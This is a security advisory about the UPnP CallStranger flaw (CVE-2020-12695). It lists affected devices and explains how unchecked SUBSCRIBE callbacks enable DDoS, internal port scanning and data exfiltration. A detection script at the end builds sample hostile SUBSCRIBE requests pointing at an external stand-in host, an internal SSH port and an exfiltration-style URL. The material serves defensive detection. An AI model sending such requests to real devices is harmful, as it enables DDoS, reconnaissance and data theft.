A new critical vulnerability has been disclosed in the UPnP (Universal Plug and Play) protocol. It affects a large share of Internet of Things (IoT) devices and other networked equipment that implement UPnP eventing.
Risks
- Remote code execution
- Data exfiltration
- Involuntary participation in a DDoS attack
Affected Systems
List of systems in which the vulnerability has been confirmed (this list is being updated):
- Windows 10 – upnphost.dll 10.0.18362.719
- Xbox One – OS Version 10.0.19041.2494
- ADB TNR-5720SX Box (TNR-5720SX/v16.4-rc-371-gf5e2289 UPnP/1.0 BH-upnpdev/2.0)
- ASUS Media Streamer
- ASUS Rt-N11
- Belkin WeMo
- Broadcom ADSL Modems
- Canon SELPHY CP1200 Printer
- Cisco X1000 – (LINUX/2.4 UPnP/1.0 BRCM400/1.0)
- Cisco X3500 – (LINUX/2.4 UPnP/1.0 BRCM400/1.0)
- D-Link DVG-N5412SP WPS Router (OS 1.0 UPnP/1.0 Realtek/V1.3)
- Epson EP, EW, XP Series (EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0)
- HP Deskjet, Photosmart, Officejet ENVY Series (POSIX, UPnP/1.0, Intel MicroStack/1.0.1347)
- Huawei HG255s Router – Firmware HG255sC163B03 (ATP UPnP Core)
- NEC Access Technica WR8165N Router (OS 1.0 UPnP/1.0 Realtek/V1.3)
- Philips 2k14MTK TV – Firmware TPL161E_012.003.039.001
- Samsung UE55MU7000 TV – Firmware T-KTMDEUC-1280.5, BT – S
- Samsung MU8000 TV
- TP-Link TL-WA801ND (Linux/2.6.36, UPnP/1.0, Portable SDK for UPnP devices/1.6.19)
- TRENDnet TV-IP551W (OS 1.0 UPnP/1.0 Realtek/V1.3)
- Zyxel VMG8324-B10A (LINUX/2.6 UPnP/1.0 BRCM400-UPnP/1.0)
Abstract
A vulnerability named CallStranger and tracked as CVE-2020-12695 was discovered and privately reported in late 2019 to the Open Connectivity Foundation (OCF) by the security researcher Yunus Çadırcı [1].
Many devices are vulnerable because they are connected directly to the Internet, or because they sit in a DMZ or are exposed to the Internet through port forwarding (PAT).
Exposed devices are very likely to be abused to build distributed denial of service (DDoS) attacks: the vulnerable device delivers its UPnP event notifications (NOTIFY) to whatever callback URL a SUBSCRIBE request names, without checking that the target belongs to the local network.
In addition, this vulnerability can allow an attacker to:
- discover the services of a local network (the device is made to contact internal hosts and ports, a port scan that bypasses perimeter network protections);
- exfiltrate data even when traffic leaving the local network is filtered by equipment such as proxy servers or data loss prevention (DLP) devices, because the outbound request is made by the trusted device itself.
OCF updated the UPnP specification on April 17, 2020 and notified most of the vendors concerned that the update should be incorporated into their products. Because this vulnerability affects a protocol and a multitude of devices, it is very likely that many devices will remain in production for a long time without receiving an update.
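The three abuses above all hinge on one field: the CALLBACK header of a UPnP SUBSCRIBE request, which a CVE-2020-12695 device contacts without checking where it points. The following script is an added example written for this page, not code from TEHTRIS or from the researcher; it builds a SUBSCRIBE request in the UPnP 1.0 eventing format and then classifies captured SUBSCRIBE requests by where their callback leads. The sample captures, the subscriber address 192.168.1.50, the 192.168.1.0/24 network, the device paths and the 200-character exfiltration threshold are all constructed assumptions.

```python
"""Added example: spot CallStranger-style UPnP SUBSCRIBE requests in captured traffic.

A UPnP control point subscribes to device events with an HTTP SUBSCRIBE request whose
CALLBACK header lists the URL(s) the device should NOTIFY. A CVE-2020-12695 device
contacts that URL unchecked, so the verdicts below flag callbacks that leave the local
network (DDoS/exfiltration), point at another internal host (port scan), or carry a
large payload in the URL (exfiltration).
"""
import ipaddress
import re
from urllib.parse import urlsplit

CALLBACK_RE = re.compile(r"<([^>]+)>")
# Assumed threshold: legitimate NOTIFY callbacks are short paths, not data carriers.
EXFIL_URL_LEN = 200


def build_subscribe(device: str, event_path: str, callback: str) -> str:
    """Build the SUBSCRIBE request a control point sends (UPnP 1.0 eventing format)."""
    return (
        f"SUBSCRIBE {event_path} HTTP/1.1\r\n"
        f"HOST: {device}\r\n"
        f"CALLBACK: <{callback}>\r\n"
        "NT: upnp:event\r\n"
        "TIMEOUT: Second-1800\r\n\r\n"
    )


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, target and an upper-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def classify_callback(url: str, subscriber_ip: str, local_nets) -> str:
    """'self': callback returns to the subscriber; 'lateral': another internal host
    (port-scan pattern); 'external': off-net target (DDoS / exfiltration pattern)."""
    host = urlsplit(url).hostname
    if host is None:
        return "malformed"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # DNS name: the device would resolve it and connect out
    if not any(addr in net for net in local_nets):
        return "external"
    if addr != ipaddress.ip_address(subscriber_ip):
        return "lateral"
    return "self"


def assess(raw: str, subscriber_ip: str, local_cidrs) -> list:
    """Return (url, verdict, exfil_suspect) for every CALLBACK URL in a SUBSCRIBE."""
    req = parse_request(raw)
    if req["method"] != "SUBSCRIBE":
        return []
    nets = [ipaddress.ip_network(c) for c in local_cidrs]
    findings = []
    for url in CALLBACK_RE.findall(req["headers"].get("CALLBACK", "")):
        verdict = classify_callback(url, subscriber_ip, nets)
        exfil = verdict == "external" and len(url) > EXFIL_URL_LEN
        findings.append((url, verdict, exfil))
    return findings


# Constructed captures (not real traffic): the subscriber is 192.168.1.50 on 192.168.1.0/24
# and the device's event endpoint is an assumed path.
LOCAL = ["192.168.1.0/24"]
SUBSCRIBER = "192.168.1.50"
DEVICE, EVENT = "192.168.1.1:49152", "/upnp/event/basicevent1"
SAMPLES = {
    "legit": build_subscribe(DEVICE, EVENT, "http://192.168.1.50:8080/notify"),
    "ddos": build_subscribe(DEVICE, EVENT, "http://203.0.113.9:80/"),
    "scan": build_subscribe(DEVICE, EVENT, "http://192.168.1.20:22/"),
    "exfil": build_subscribe(DEVICE, EVENT, "http://203.0.113.9/c?d=" + "A" * 300),
}


def run_samples() -> dict:
    """Assess every constructed capture; keyed by sample name."""
    return {name: assess(raw, SUBSCRIBER, LOCAL) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in run_samples().items():
        print(name, findings)
```

On a real network, `assess` would be fed the SUBSCRIBE requests seen on the device's UPnP port (the `HOST` header's port, 49152 here) with the subscriber's actual source address; any "lateral" or "external" verdict against an Internet-exposed device is the signal to look for, and a patched device should answer such requests with an error rather than a `200 OK` carrying an `SID` header.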
TEHTRIS NTA